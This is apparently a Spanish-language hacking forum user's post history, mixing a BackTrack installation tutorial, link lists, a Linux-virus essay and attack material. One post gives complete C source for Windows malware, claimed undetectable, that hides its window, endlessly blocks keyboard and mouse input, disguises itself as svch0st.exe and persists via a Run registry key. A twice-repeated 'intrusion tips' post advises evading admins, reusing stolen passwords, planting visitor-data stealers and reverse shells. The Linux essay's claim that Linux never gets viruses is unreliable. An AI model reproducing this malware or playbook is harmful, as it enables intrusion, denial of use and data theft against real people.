Buen aporte K43l aunque esta tecnica es nada mas de ponerme a pensar nunca se me ocurrio jeje 
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#1
Bugs y Exploits / Re: Hacking de cuentas de Hotmail y Facebook por Sql Injection
Julio 12, 2012, 01:51:42 PM #2
IOS / Re:Como exportar aplicacion flash a ipad
Julio 12, 2012, 01:28:40 PM
Tengo una duda men bien me descargo el Flash luego puedo colocar algun juego Flash que tengo en mi PC osea lo Exporto al Flash y luego lo puedo guardar con Extension .IPA para poder colocarlo en mi Iphone..? Crees que Funcionara... 
#3
Hacking / Re:dejar sin internet a otro PC por envenenamiento ARP by fNiX
Mayo 27, 2012, 05:30:53 PM
Esto quiere decir que no se puede hacer tan solo en una area local no si no que con cualquier IP?
#4
Windows / Re:Instala y ejecuta programas sin dañar tu Sistema con Sandboxie
Diciembre 06, 2011, 04:36:36 PM
Buen trabajo men salu2 !
#5
Galería / Re:Mi Portafolio de Diseños web HTML
Diciembre 04, 2011, 07:18:07 PM
buen trabajo amigo !
#6
Dudas y pedidos generales / Re:[Opinion]Web propia
Noviembre 26, 2011, 12:47:28 PM
Amigo te recomiendo Wordpress ya que es mas comprensible y mas usual te acostumbraras eejj salu2 men
#7
Tutoriales y Manuales de Malwares / Re:VirtualBox [Tutorial completo] By ANTRAX
Noviembre 25, 2011, 07:11:39 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias Por el Aporte Man Gracias Como Siempre Aportando un Slu2
Hey men te recomiendo que no uses tanto mayuscula y tampoco en negrita cuando es una respuesta rapida men ya que te regañaran solo te lo digo para que no te pase lo mimso que me paso a mi salu2 men
Aaaaaa ok Man Disculpa, Me Advirtieron Anteriormente Pero Por Mayuscula Y Era Negrita, Ahora Ya Comprendo Gracias Por Correjirme Se le Agradecee Parce
jejejje de nada men para eso estamos los amigos para conrrejirte
#8
Tutoriales y Manuales de Malwares / Re:VirtualBox [Tutorial completo] By ANTRAX
Noviembre 24, 2011, 05:06:56 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias Por el Aporte Man Gracias Como Siempre Aportando un Slu2
Hey men te recomiendo que no uses tanto mayuscula y tampoco en negrita cuando es una respuesta rapida men ya que te regañaran solo te lo digo para que no te pase lo mimso que me paso a mi salu2 men
#9
C / C++ / Re:Programa un virus en C sin ser detectado por nada "Source"
Noviembre 22, 2011, 10:26:01 PMCita de: [Corruptedyte link=topic=8180.msg29110#msg29110 date=1321932430]
By Darax.
Esto que acabas de hacer es de muy mal gusto, jamas te robes los creditos de un codigo que no es tuyo y mucho menos si no sabes ni un poco de C
Me disculpo men es que se me olvido salu2 !!
#10
Dudas y pedidos generales / Re:Backtrack
Noviembre 22, 2011, 10:16:23 PM
men antrax talvez ya viste el tuto o nose xD aqui yo hoy postie de como instalarlo y de la vercion que tu quieres bueno eso creo xD
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
salu2 men !
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
salu2 men !
#11
GNU/Linux / [TUTORIAL] Instalar BackTrack 5 Gnome + Cambio de idioma
Noviembre 22, 2011, 06:58:37 PMBuenas Underc0de hoy vengo con este tutorial el cual tratara de cómo instalar Backtrack 5 muy bien espero que les sea de su agrado y pues empecemos:
-Bien antes que nada una pequeña info de la Distribucion:
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.
Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.1
Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 32 de la famosa lista "Top 100 Network Security Tools" de 2006.2
Bueno ahora si empecemos con el tutorial; Bueno chicos antes que nada tienen ir a la pagina de descarga para asi poderse descargar el distro:
Bien si ustedes quieren llenan esos datos no necesariamente tiene que ser obligatorio jeje bueno ahora el siguiente paso es seleccionar todas la opciones bien para seguir con el tutorial ya que si te vienes empezando en el mundo Linux lo mejor sería solo guiarse no mas pero si eres avanzado pues cambiarle las opciones del distro ok, bueno solo seleccionen todo a como aparece en la imagen:
Bien ya teniendo esto le damos en el boton click to donwload y ahora dejamos que se descargue ok el archivo ISO pesa como 2 GB a algunos le saldra 1,9 pero es normal ok, Bueno prosigamos ahora abrimos el VMware workstation 6 aquí la podran descagar
:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bien ya que se lo Descargaron ahora prosigamos lo abren se van a adonde dice NEW VIRTUAL MACHINE
Ahoralo dejan en Typical
Colocan la opción de instalar disco de imagen (ISO) y lo buscan:
Bien ahora en los sistemas Operativos Colocan la Opcion que dice Linux y en la versión colocan other Linux 2.6.xx kernel:
Ahora colocan el nombre que quieran en donde esta subrayado es donde tienen que poner el nombre:
Bien ahora le damos next y en el espacio en disco le dan lo que ustedes quieran claro mas de 20 gb basta yo le pondré 25:
Y dejamos las otras opciones como están ok, ahora le damos en next y y luego customize hardware
Ahora nos vamos a la opción de network adapter y lo colocamos a como se encuentra en la imagen:
Bien ahora le damos OK y luego FINISH e imediatamente se nor arrancara el Sitema Operativo, Bueno ya cuando les arranque y les salgan el boot le dan enter:
Y se nos abrirá un menú , es el menú de backtrack live cd:
Bien solo le damos enter a la opción que esta marcada y dejamos que cargue:
Dejamos que se nos cargue todo:
Bien ya después que se nos alla cargado nos mostrara la Shell del backtrack:
Bien ahora solo colocamos STARTX y le damos enter:
Dejemos que se nos cargue todo y cuando ya se nos cargue nos saldrá la distro con sus menus fondo etc...xD
Bien ahora instalaremos la Distro para ello vamos a darle doble click al archivo que aparece en el escritorio llamado Install BackTrack
Puede que les dure caragando el archivo pero déjenlo que abra, Bien luego de que se les alla abierto colocan el idioma español:
Ahora en ese momento se les va a configurar el reloj :
Luego les pedirán donde se encuentran para poder confirmar:
Le damos adelante y nos toparemos con la distribución del teclado bueno esto generalemente backtrack se acomoda con el taclado español y si a ustedes no tienen que pner ese teclado solo pregunten donde crearon su teclado xD segurament en la caja de compra decía jjjee bueno algo asi tienen que poner:
En donde se encuentra subrayado el texto es para probar si el distro reconoce las teclas que tu quieres que salgan ok bueno seguimos adelante; Bien aquí es algo complicado para los que instalan el distro en una PC con otro sistema operativo ya que antes de hacer todo tienen que primero particionar el disco pero como en el caso de nosotros lo estamos instalando en una maquina virtual pues colocamos estas opciones:
Bien en si nomas se deja asi ya que el distro lo detecta jje pero si no les sale asi tienen que dejarlo a como sle en la imagen ok
bueno sigamos adelante
Ahora tan solo en esta ventana nos mostrara la información y todo y solo le tendríamos que dar Instalar para que se nos instale la distro, ya dándole instalar dejamos que se instale tranquilamente osea no se desesperen jeje
Bueno ya después de que se alla instalado y todo nos saldrá esto:
Le damos en reiniciar ahora y ya esta con esto tendríamos instalado la distro (talvez dure en reiniciarse pero déjenla xD valdrá la pena
Bueno ya cuando les salga esto osea el logueo ya para entrar a su distro instalado
Solo escriben ROOT (en minúscula) y le dan enter y luego en la password colocan TOOR (en minúscula) y luego les abrirá normalmente la distro como se les había mostrado bueno ahora de una vez vamos a colocar el backtrack en español, Bien primero Abrimos una terminal que generalmente en backtrack se encuentra arribita es como una ventanita negra xD
Bien y ahora escribimos en la terminal: apt-get install language-selector
A mi me dice que yo ya lo tengo instalado porque obvio lo tengo instalado jeje pero si a ustedes les pide en un momento poner S o N pongan S ok ahí si le salen verán que quiero decir
Bien ahora colocamos después gnome-language-selector para que se nos abra lo que acabamos de instalar xD
Aquí le daremos instalar y se nos empezaran a descargar los paquetes dejamos con mucha paciencia que haga la magia ok
Bien ya teniendo instalado los paquetes ahora solo le damos al botón que dice instalar y eliminar idiomas...
Y ahí les saldrá una lista de idiomas escojen a como gusten de hecho que español jeje lo palomean y luego aplicar cambios y listo dejan que se les descargue el paquete y lugeo solo seleccionan el idioma en la ventana que les aparece y le dan APLICAR A TODO EL SISTEMA y listo ya con eso tienen cambiado el idioma solo queda reiniciarlo y ya.
Bueno espero que les alla gustado el tutorial me llevo 2 dias prepararlo jeje si hay algo malo haganmelo saber para corregirme y correjirlo les mando un saludo a SPELINAX, ANTRAX, Xt3mP, Snifer, 2fac3r, Spectrus y a Yoya salu2 a todos amigos
by Dr0B4ck...
#12
Pentesting / Re:Glosario de Temas del Subforo Pentesting
Noviembre 22, 2011, 02:07:20 AMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buen trabajo bro.. +1 y chincheta
Muchas Gracias amigo !
#13
Pentesting / [F.A.Q.] RECOPILACIÓN DE TEMAS
Noviembre 22, 2011, 01:52:29 AM
Buenas Amigos de Underc0de, bueno antes que nada con todo el respeto de Antrax , Xt3mP y los Moderadores del foro solo quize hacerlo porque pense que les hiba hacer algo de ayuda espero que les guste y tambien espero este bien Conformado salu2 !
Metasploit:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Herramientas de Pentest:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Manuales y Papers:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Sistema Operativos de Pentesting:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Otros:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Dudas:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
P.D: El Glosario se estara Actualizando por cada Tema nuevo que se cree en el Subforo salu2 a todos !
Metasploit:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Herramientas de Pentest:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Manuales y Papers:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Sistema Operativos de Pentesting:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Otros:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Dudas:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
P.D: El Glosario se estara Actualizando por cada Tema nuevo que se cree en el Subforo salu2 a todos !
#14
Pentesting / Re:Tips para una Buena Intrusion en un sistema
Noviembre 22, 2011, 12:25:40 AMCita de: [Corruptedyte link=topic=8181.msg29107#msg29107 date=1321932208]
By _84kur10_
ciuerto me brinque eso jajaja vale ya lo pongo xDD
#15
Pentesting / Tips para una Buena Intrusion en un sistema
Noviembre 22, 2011, 12:18:01 AM
Buenas Underc0de espero que anden bien y que les agrade el tuto salu2 amigos !!!
Reconocimiento del Objetivo.
Todo empieza en el momento en que deseamos colocar a prueba un sistema de información o porque no toda una infraestructura de red, lo primero como todos saben es conocer nuestro objetivo, es decir, necesitamos saber todo acerca de lo que deseamos atacar, no tiene que ser precisamente colocandole a correr un scan de vulnerabilidades como locos, de hecho esta opción no es recomendable. Eres de los que usa Acunetix para probar vulnerabilidades de un sitio, durante un ataque real?, no es aconsejable, debido a que es muy escandaloso, lo primero que van a lograr es alertar al encargadado de la red o del sistema, lo aconsejable es hacerlo manualmente,ojala en horas en que sepamos que el admin del sitio duerme, con calma, mirando todos los puntos de entrada y salida de información. Un Scan de puertos es una buena opción. Aun asi, con estas medidas de prevención no estamos seguros, debemos desde el inicio usar alguna vpn, y bueno no lo hagan desde sus casas. "Si si, es reparanoico, pero es mejor". Y por ultimo, supremamente recomendable, mirar los DNS, es un lugar donde a veces se encuentran cosas muy interesantes.
Ataque Inderecto
Aqui tambien es importante tener en cuenta que para llegar a mi objetivo no necesariamente debe ser un ataque directo, es decir, podemos mirar sus subdominios "en el caso de un sitio web", podemos mirar quienes desarrollaron el sistema, o que fabricante provee algun tipo de software o aplicativo, con el fin de testear otros sistemas, Como asi?, bien pues veran, si pepito se dedica a hacer cajas fuertes super seguras, es probable que pepito antes de llegar a su modelo de caja actual, tuvo que pasar por varias etapas, en las que creo modelos de cajas no tan seguras, si lograramos a partir de una caja no tan segura, encontrar un patro de diseño, podriamos penetrar una de sus cajas fuertes actualies super seguras.
Caso practico que me sucedio, tenia un aplicativo web en su ultima version y usado masivamente sin ningun bug visible, busque versiones previas, encontre algunos bugs, explote, y me di cuenta de un usuario por default, solo fue cuestión de ir al aplicativo en su ultima version y testearle el usuario por default, y efectivamente lo tenia. Si si, no siempre funciona pero hay que considerar todas las posibilidades
Analisis de informacion.
Bueno ya tenemos un listado de información y de versiones de diferentes servicios y aplicaciones de nuestro sistema objetivo, apartir de aquí viene un proceso de investigación, como asi?, bien pues por ejemplo, si tenemos php 4, pues debemos preguntarnos, que cambios existen entre php 4 y el actual?, esos cambios fueron correcciones de seguridad?, si es así, hay que ver de que manera esa versión de php nos va a servir en nuestra intrusión. Asi mismo con los servicios,cms etc. Bueno si es su ultima version, no olviden el punto anterior, y bueno si no hay mas opción, busquemos un 0day en el aplicativo o en el servicio.
Explotando
En este punto, despues de una gran recopilación de versiones, de posibles vulnerabilidades, le probamos algunas vulnerabilidades, obviamente con las medidas de precausion necesarias.
Despues de explotar algunos bugs, nos podemos topar con los siguientes lios:
Tengo un password y no encontre el admin panel o no me funciona el password en el admin panel que tengo que hago?
Buscate todos los pass de la bd que correspondan a usuarios con privilegios "De donde los sacas?, de donde sacaste el pass que tienes", y prueba esos pass en sus mails, busca el cpanel del sitio.
Ese pass que tienes, pruebalo en todos los servicios que puedas, y en todas las partes que puedas, pues probablemente usan el mismo password en otros servicios, ftp, base de datos, cpanel, y otros sistemas.
LLegamos al panel del admin, y no puedo subir archivos que hago?
En este punto, se supone que podemos modificar el contenido del sitio. Asi que es recomendable hacer algo de client inside penetratio testing, es decir, ponte un analizador de navegadores y un stealer de informacion de los visitantes o programate uno, y ponlo por medio del contenido que puedes modificar, y obten las ip, y determina, la información del admin del sitio, verifica que navegador usa, y busca vulnerabilidades de ese navegador, y explota una vulnerabilidad del navegador desde su propio servidor, la idea es aprovechar la confianza que el tiene en su sitio.
Mi objetivo está en de MZ, y estoy en la DMZ, y la infraestructura de red implementa un modelo de seguridad en profundidad, es decir, hay un firewall que divinen de MZ y la DMZ, como llego a mi objetivo?
Para resolver este punto preguntate que hay de comun entre la DMZ y la MZ?, seria que los usuarios de la MZ tienen de pagina de inicio la web que de la que te apodareste?, puedes investigar las versiones de los navegadores de esos usuarios?. Si es asi, prueba explotar vulnerabilidades en sus navegadores, prueba hacer un reverse shell pero al servidor en la DMZ del cual tienes control, porq?, si es un sistema complejo el proxi no dejara sacar la conexión tan facilmente, y no solo el proxy, también las N capas de seguridad que tengan.
Complicandolo un poco mas.
Si el sistema es muy complejo porque usan Certificados Digitales, y no puedes realizar captura de paquetes con sniifers ni nada de eso, no entres en panico, si usan certificados digitales 2048 bits relax, pues ya sabes que estan asegurando el protocolo http, asi que cambiate de capa, explota la capa de aplicación, pueden tener la super seguridad en todas sus capas, pero pocos se preocupan por la seguridad en la capa de aplicación, como asi?, si, un CSRF es un CSRF con o sin HTTPS, el cruce de dominio por falsificación de petición va ligado de las propiedades del nagevador, si el navegador tiene el certificado, el CSRF no deberia tener problema.
Subi una shell pero hay modo seguro que hago?.
Verifica versiones del servidor web y de las tecnologias que soportan, y verifica que tengan las ultimas, si no es así, aprovecha y verifica si existen formas de saltar el modo seguro en esas versiones de tecnologias.
By _84kur10_
Todo empieza en el momento en que deseamos colocar a prueba un sistema de información o porque no toda una infraestructura de red, lo primero como todos saben es conocer nuestro objetivo, es decir, necesitamos saber todo acerca de lo que deseamos atacar, no tiene que ser precisamente colocandole a correr un scan de vulnerabilidades como locos, de hecho esta opción no es recomendable. Eres de los que usa Acunetix para probar vulnerabilidades de un sitio, durante un ataque real?, no es aconsejable, debido a que es muy escandaloso, lo primero que van a lograr es alertar al encargadado de la red o del sistema, lo aconsejable es hacerlo manualmente,ojala en horas en que sepamos que el admin del sitio duerme, con calma, mirando todos los puntos de entrada y salida de información. Un Scan de puertos es una buena opción. Aun asi, con estas medidas de prevención no estamos seguros, debemos desde el inicio usar alguna vpn, y bueno no lo hagan desde sus casas. "Si si, es reparanoico, pero es mejor". Y por ultimo, supremamente recomendable, mirar los DNS, es un lugar donde a veces se encuentran cosas muy interesantes.
Ataque Inderecto
Aqui tambien es importante tener en cuenta que para llegar a mi objetivo no necesariamente debe ser un ataque directo, es decir, podemos mirar sus subdominios "en el caso de un sitio web", podemos mirar quienes desarrollaron el sistema, o que fabricante provee algun tipo de software o aplicativo, con el fin de testear otros sistemas, Como asi?, bien pues veran, si pepito se dedica a hacer cajas fuertes super seguras, es probable que pepito antes de llegar a su modelo de caja actual, tuvo que pasar por varias etapas, en las que creo modelos de cajas no tan seguras, si lograramos a partir de una caja no tan segura, encontrar un patro de diseño, podriamos penetrar una de sus cajas fuertes actualies super seguras.
Caso practico que me sucedio, tenia un aplicativo web en su ultima version y usado masivamente sin ningun bug visible, busque versiones previas, encontre algunos bugs, explote, y me di cuenta de un usuario por default, solo fue cuestión de ir al aplicativo en su ultima version y testearle el usuario por default, y efectivamente lo tenia. Si si, no siempre funciona pero hay que considerar todas las posibilidades
Analisis de informacion.
Bueno ya tenemos un listado de información y de versiones de diferentes servicios y aplicaciones de nuestro sistema objetivo, apartir de aquí viene un proceso de investigación, como asi?, bien pues por ejemplo, si tenemos php 4, pues debemos preguntarnos, que cambios existen entre php 4 y el actual?, esos cambios fueron correcciones de seguridad?, si es así, hay que ver de que manera esa versión de php nos va a servir en nuestra intrusión. Asi mismo con los servicios,cms etc. Bueno si es su ultima version, no olviden el punto anterior, y bueno si no hay mas opción, busquemos un 0day en el aplicativo o en el servicio.
Explotando
En este punto, despues de una gran recopilación de versiones, de posibles vulnerabilidades, le probamos algunas vulnerabilidades, obviamente con las medidas de precausion necesarias.
Despues de explotar algunos bugs, nos podemos topar con los siguientes lios:
Tengo un password y no encontre el admin panel o no me funciona el password en el admin panel que tengo que hago?
Buscate todos los pass de la bd que correspondan a usuarios con privilegios "De donde los sacas?, de donde sacaste el pass que tienes", y prueba esos pass en sus mails, busca el cpanel del sitio.
Ese pass que tienes, pruebalo en todos los servicios que puedas, y en todas las partes que puedas, pues probablemente usan el mismo password en otros servicios, ftp, base de datos, cpanel, y otros sistemas.
LLegamos al panel del admin, y no puedo subir archivos que hago?
En este punto, se supone que podemos modificar el contenido del sitio. Asi que es recomendable hacer algo de client inside penetratio testing, es decir, ponte un analizador de navegadores y un stealer de informacion de los visitantes o programate uno, y ponlo por medio del contenido que puedes modificar, y obten las ip, y determina, la información del admin del sitio, verifica que navegador usa, y busca vulnerabilidades de ese navegador, y explota una vulnerabilidad del navegador desde su propio servidor, la idea es aprovechar la confianza que el tiene en su sitio.
Mi objetivo está en de MZ, y estoy en la DMZ, y la infraestructura de red implementa un modelo de seguridad en profundidad, es decir, hay un firewall que divinen de MZ y la DMZ, como llego a mi objetivo?
Para resolver este punto preguntate que hay de comun entre la DMZ y la MZ?, seria que los usuarios de la MZ tienen de pagina de inicio la web que de la que te apodareste?, puedes investigar las versiones de los navegadores de esos usuarios?. Si es asi, prueba explotar vulnerabilidades en sus navegadores, prueba hacer un reverse shell pero al servidor en la DMZ del cual tienes control, porq?, si es un sistema complejo el proxi no dejara sacar la conexión tan facilmente, y no solo el proxy, también las N capas de seguridad que tengan.
Complicandolo un poco mas.
Si el sistema es muy complejo porque usan Certificados Digitales, y no puedes realizar captura de paquetes con sniifers ni nada de eso, no entres en panico, si usan certificados digitales 2048 bits relax, pues ya sabes que estan asegurando el protocolo http, asi que cambiate de capa, explota la capa de aplicación, pueden tener la super seguridad en todas sus capas, pero pocos se preocupan por la seguridad en la capa de aplicación, como asi?, si, un CSRF es un CSRF con o sin HTTPS, el cruce de dominio por falsificación de petición va ligado de las propiedades del nagevador, si el navegador tiene el certificado, el CSRF no deberia tener problema.
Subi una shell pero hay modo seguro que hago?.
Verifica versiones del servidor web y de las tecnologias que soportan, y verifica que tengan las ultimas, si no es así, aprovecha y verifica si existen formas de saltar el modo seguro en esas versiones de tecnologias.
By _84kur10_
#16
C / C++ / Programa un virus en C sin ser detectado por nada "Source"
Noviembre 21, 2011, 11:56:48 PM
Buenas Underc0de, sean bienvenidos a mi post, esta vez estare enseñando como crear un programa o virus, como ustedes lo quieran llamar, que bloquea el sistema, el raton y el teclado, solo tienen que añadirlo al inicio en el registro y todo esto sin ser detectado por ningun AntiVirus.
Código: c
By Darax.
#include <windows.h>
#include <tlhelp32.h>
#include <winable.h>
#define BUFSIZE 80
int test_key(void);
int create_key(char *);
int main(void)
{
int test,create;
test=test_key();
if (test==2)
{
char *path="c:\\WINDOWS\\svch0st.exe";
create=create_key(path);
}
HWND inv;
AllocConsole();
inv=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(inv,0);
int c;
for(;;)
{
BlockInput(true);
}
char root[60]="C:\\Windows\\";
char nombre[60]="svch0st";
char path[256]="svch0st";
strcat(nombre,".exe");
strcat(root,nombre);
HMODULE copiar = GetModuleHandle(0);
GetModuleFileName(copiar, path, 256);
CopyFile(path,root,false);
}
int test_key(void)
{
int check;
HKEY hKey;
char path[BUFSIZE];
DWORD buf_length=BUFSIZE;
int reg_key;
reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
if(reg_key!=0)
{
check=1;
return check;
}
reg_key=RegQueryValueEx(hKey,"Windows Files",NULL,NULL,(LPBYTE)path,&buf_length);
if((reg_key!=0)||(buf_length>BUFSIZE))
check=2;
if(reg_key==0)
check=0;
RegCloseKey(hKey);
return check;
}
int create_key(char *path)
{
int reg_key,check;
HKEY hkey;
reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
if(reg_key==0)
{
RegSetValueEx((HKEY)hkey,"Windows files",0,REG_SZ,(BYTE *)path,strlen(path));
check=0;
return check;
}
if(reg_key!=0)
check=1;
return check;
}By Darax.
#17
Bugs y Exploits / Re:DDos Attack (explicacion) Mediante CMD
Noviembre 21, 2011, 11:24:38 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por favor no desvíen el tema, el foro esta creado principalmente para debatir y aclarar dudas comunitarias para un bien común.
Tal vez otro sea más experimentado que otro, pero todos comenzamos desde 0.
En vez de comenzar a pelear aclárenle la duda de buena manera y no desvíen el tema.
Xt3mp gracias por poner orden men te lo agradeco
#18
GNU/Linux / ¿¿Porque en Linux Nunca Hay Virus??
Noviembre 21, 2011, 08:28:00 PM
Buenas Underc0de aqui voy a postear algo interesante espero que les interese
"Los virus son la pesadilla de los administradores, cada mes aparecen mas de 30 mil y es un hecho que las actualizaciones mensuales de los antivirus no los incluyen a todos. Para los usuarios no expertos también son una molestia, los antivirus pueden hacer que una computadora pierda hasta el 30% de su veocidad. Cada año cientos de millones de dólares se pierden en horas/hombre (y horas/mujer ;-) ) por los virus en todo el mundo.
Para que un programa sea considerado como un virus debe cumplir dos requisitos:
1) Que se copie a sí mismo
2) Que se propague de manera "natural" entre los sistemas
ANDRES MALPARICULILAMBIDO -Los //gusanos// son programas que aprovechan un //exploit// (error en el código de un programa) para infiltrarse en un sistema. Los //troyanos// son gusanos que abren un puerto trasero para permitir que una persona ajena entre al sistema. La diferencia principal entre los virus y los gusanos radica en que los virus se propagan sólos por la red, mientras que alguien (un hacker) debe realizar acciones especificas para implantar un gusano. Por cada máquina atacada por un gusano existen miles (quizás millones) de equipos infectados por virus. En GNU/Linux hay gusanos y troyanos, pero no virus.
Con frecuencia he escuchado la opinion de "expertos" que argumentan que en Linux no hay virus porque hay pocos equipos con este sistema operativo, pero que en cuanto se vuelva más popular los virus aparecerán. Obviando el hecho de que Unix/Linux poseen el 40% del mercado de servidores, esta opinión revela las pobres expectativas que Microsoft le ha impuesto al usuario común, pues según éste, es normal que todos los sistemas operativos sean afectados por los virus. Pero en realidad, solo Windows padece de los virus. No todo es culpa de Microsoft, no ha sido fácil llevar a un sistema operativo tan deficiente como Windows95 al exigente mundo de los servidores: en busca de un buen desempeño, se ha debido de pagar un precio en la seguridad de Windows XP y Windows 2003, quizás un precio demasiado alto.
El hecho, sin embargo, es que en Linux no hay ni habrá virus, (la verdad es que en ningún sistema operativo deberían de existir los virus), la razón radica en la gestión de memoria y la asignacion de permisos por omisión, los cuales hacen imposible que un programa no autorizado se ejecute y propague. Varias consultoras reportan que los servidores mas atacados en Internet son los basados en Linux, y la gran mayoria sale victorioso de la prueba. Sin embargo, esto no significa que este sistema operativo sea invulnerable: los programas y el mismo kernel poseen fallas que al ser explotadas permiten que, en casos extremos, un extraño tome control del equipo. La mejor manera de prepararse para un ataque es siendo uno mismo un hacker, escaneando los puerto de nuestro server, inyectando SQL en nuestras paginas web y tratando de ejecutar codigo malicioso. Lo más importante es frecuentar sitios que informen sobre fallos de seguridad, como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y buscar actualizaciones para nuestro sistema cada siete dias. Existen muchas soluciones que automatizan este proceso."
Espero que no queden dudas!
fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
"Los virus son la pesadilla de los administradores, cada mes aparecen mas de 30 mil y es un hecho que las actualizaciones mensuales de los antivirus no los incluyen a todos. Para los usuarios no expertos también son una molestia, los antivirus pueden hacer que una computadora pierda hasta el 30% de su veocidad. Cada año cientos de millones de dólares se pierden en horas/hombre (y horas/mujer ;-) ) por los virus en todo el mundo.
Para que un programa sea considerado como un virus debe cumplir dos requisitos:
1) Que se copie a sí mismo
2) Que se propague de manera "natural" entre los sistemas
ANDRES MALPARICULILAMBIDO -Los //gusanos// son programas que aprovechan un //exploit// (error en el código de un programa) para infiltrarse en un sistema. Los //troyanos// son gusanos que abren un puerto trasero para permitir que una persona ajena entre al sistema. La diferencia principal entre los virus y los gusanos radica en que los virus se propagan sólos por la red, mientras que alguien (un hacker) debe realizar acciones especificas para implantar un gusano. Por cada máquina atacada por un gusano existen miles (quizás millones) de equipos infectados por virus. En GNU/Linux hay gusanos y troyanos, pero no virus.
Con frecuencia he escuchado la opinion de "expertos" que argumentan que en Linux no hay virus porque hay pocos equipos con este sistema operativo, pero que en cuanto se vuelva más popular los virus aparecerán. Obviando el hecho de que Unix/Linux poseen el 40% del mercado de servidores, esta opinión revela las pobres expectativas que Microsoft le ha impuesto al usuario común, pues según éste, es normal que todos los sistemas operativos sean afectados por los virus. Pero en realidad, solo Windows padece de los virus. No todo es culpa de Microsoft, no ha sido fácil llevar a un sistema operativo tan deficiente como Windows95 al exigente mundo de los servidores: en busca de un buen desempeño, se ha debido de pagar un precio en la seguridad de Windows XP y Windows 2003, quizás un precio demasiado alto.
